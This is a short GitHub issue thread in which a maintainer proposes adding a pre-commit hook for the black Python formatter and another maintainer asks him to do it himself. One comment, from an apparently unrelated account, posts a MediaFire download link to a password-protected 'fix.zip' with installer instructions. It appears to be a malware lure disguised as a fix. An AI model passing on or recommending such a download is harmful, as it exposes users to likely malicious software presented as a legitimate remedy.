### ISSUE TITLE
Add pre-commit hook for Python black

### ISSUE THREAD

**Issue by jbampton** [SalamLang/Salam#214]
https://github.com/psf/black

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BaseMax** [comment]
pls do it yourself, thanks in advance

**Comment by BaseMax** [comment]
a reminder
